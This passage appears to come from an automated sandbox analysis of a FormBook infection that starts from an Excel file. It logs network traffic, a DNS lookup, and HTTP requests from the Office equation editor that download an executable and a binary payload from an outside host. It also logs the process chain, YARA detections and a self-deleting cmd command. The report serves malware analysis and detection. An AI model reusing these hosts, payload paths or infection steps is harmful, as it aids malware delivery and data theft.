                  Nov 19, 2020 07:43:19.155327082 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.155329943 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.155369997 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.155373096 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.155411005 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.155430079 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.155452967 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.155456066 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.155509949 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.470755100 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.470823050 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.470858097 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.470897913 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.470940113 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.470978022 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.471029043 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.471072912 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.471095085 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.471113920 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.471139908 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.471174002 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.471195936 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.471206903 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.471240997 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.471268892 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.471292973 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.471302032 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.471338987 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.471365929 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.471384048 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.471393108 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.471446037 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.471466064 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.471503019 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.471513033 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.471576929 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.474473000 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.786644936 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.786705971 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.786746025 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.786786079 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.786823988 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.786874056 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.786895037 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.786921024 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.786942959 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.786948919 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.786959887 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.786993980 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.786999941 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.787026882 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.787041903 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.787069082 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.787081003 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.787089109 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.787122965 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.787148952 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.787162066 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.787163019 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.787211895 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.787221909 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.787256956 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.787271023 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.787297964 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.787323952 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.787338972 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.787354946 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.787379980 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.787395000 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.787410021 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.787451029 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.787461042 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.789587021 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:20.189624071 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:44:35.703872919 CET | 49166 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:44:36.028314114 CET | 80 | 49166 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:44:36.028513908 CET | 49166 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:44:36.030811071 CET | 49166 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:44:36.356791973 CET | 80 | 49166 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:44:36.356851101 CET | 80 | 49166 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:44:36.356889963 CET | 80 | 49166 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:44:36.356926918 CET | 80 | 49166 | 103.125.191.5 | 192.168.2.22

                  UDP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Nov 19, 2020 07:43:18.152446032 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                  Nov 19, 2020 07:43:18.188976049 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22

                  DNS Queries

                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  Nov 19, 2020 07:43:18.152446032 CET | 192.168.2.22 | 8.8.8.8 | 0xe410 | Standard query (0) | wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu | A (IP address) | IN (0x0001)

                  DNS Answers

                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Nov 19, 2020 07:43:18.188976049 CET | 8.8.8.8 | 192.168.2.22 | 0xe410 | No error (0) | wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu | (none) | 103.125.191.5 | A (IP address) | IN (0x0001)

                  HTTP Request Dependency Graph

                  • wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
                  • 103.125.191.5

                  HTTP Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.22 | 49165 | 103.125.191.5 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 19, 2020 07:43:18.523520947 CET | 0 | OUT | GET /worksdoc/svchost.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
                  Connection: Keep-Alive
                  Nov 19, 2020 07:43:18.839695930 CET | 2 | IN | HTTP/1.1 200 OK
                  Date: Thu, 19 Nov 2020 06:43:17 GMT
                  Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                  Last-Modified: Wed, 18 Nov 2020 21:48:32 GMT
                  ETag: "f000-5b4689298b6b3"
                  Accept-Ranges: bytes
                  Content-Length: 61440
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.22 | 49166 | 103.125.191.5 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 19, 2020 07:44:36.030811071 CET | 66 | OUT | GET /bin_xMjelaYnr43.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: 103.125.191.5
                  Cache-Control: no-cache
                  Nov 19, 2020 07:44:36.356791973 CET | 67 | IN | HTTP/1.1 200 OK
                  Date: Thu, 19 Nov 2020 06:44:35 GMT
                  Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                  Last-Modified: Wed, 18 Nov 2020 21:20:27 GMT
                  ETag: "2d640-5b4682e21b662"
                  Accept-Ranges: bytes
                  Content-Length: 185920
                  Content-Type: application/octet-stream


                  Code Manipulations

                  Statistics

                  Behavior


                  System Behavior

                  General

                  Start time: 07:42:52
                  Start date: 19/11/2020
                  Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit): false
                  Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase: 0x13ff00000
                  File size: 27641504 bytes
                  MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  General

                  Start time: 07:43:12
                  Start date: 19/11/2020
                  Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit): true
                  Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Imagebase: 0x400000
                  File size: 543304 bytes
                  MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  General

                  Start time: 07:43:15
                  Start date: 19/11/2020
                  Path: C:\Users\Public\vbc.exe
                  Wow64 process (32bit): true
                  Commandline: 'C:\Users\Public\vbc.exe'
                  Imagebase: 0x400000
                  File size: 61440 bytes
                  MD5 hash: C05EEE88F0B57E853996957D6523397B
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: Visual Basic
                  Reputation: low

                  General

                  Start time: 07:44:20
                  Start date: 19/11/2020
                  Path: C:\Users\Public\vbc.exe
                  Wow64 process (32bit): true
                  Commandline: 'C:\Users\Public\vbc.exe'
                  Imagebase: 0x400000
                  File size: 61440 bytes
                  MD5 hash: C05EEE88F0B57E853996957D6523397B
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation: low

                  General

                  Start time: 07:44:35
                  Start date: 19/11/2020
                  Path: C:\Windows\explorer.exe
                  Wow64 process (32bit): false
                  Commandline:
                  Imagebase: 0xffca0000
                  File size: 3229696 bytes
                  MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: moderate

                  General

                  Start time: 07:44:45
                  Start date: 19/11/2020
                  Path: C:\Windows\SysWOW64\autoconv.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Windows\SysWOW64\autoconv.exe
                  Imagebase: 0xa90000
                  File size: 679424 bytes
                  MD5 hash: 09D786401F6CA6AEB16B2811B169F944
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: moderate

                  General

                  Start time: 07:44:45
                  Start date: 19/11/2020
                  Path: C:\Windows\SysWOW64\NAPSTAT.EXE
                  Wow64 process (32bit): true
                  Commandline: C:\Windows\SysWOW64\NAPSTAT.EXE
                  Imagebase: 0x960000
                  File size: 279552 bytes
                  MD5 hash: 4AF92E1821D96E4178732FC04D8FD69C
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, Author: Florian Roth
                  Reputation: moderate

                  General

                  Start time: 07:44:49
                  Start date: 19/11/2020
                  Path: C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit): true
                  Commandline: /c del 'C:\Users\Public\vbc.exe'
                  Imagebase: 0x4a920000
                  File size: 302592 bytes
                  MD5 hash: AD7B9C14083B52BC532FBA5948342B98
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  Disassembly

                  Code Analysis
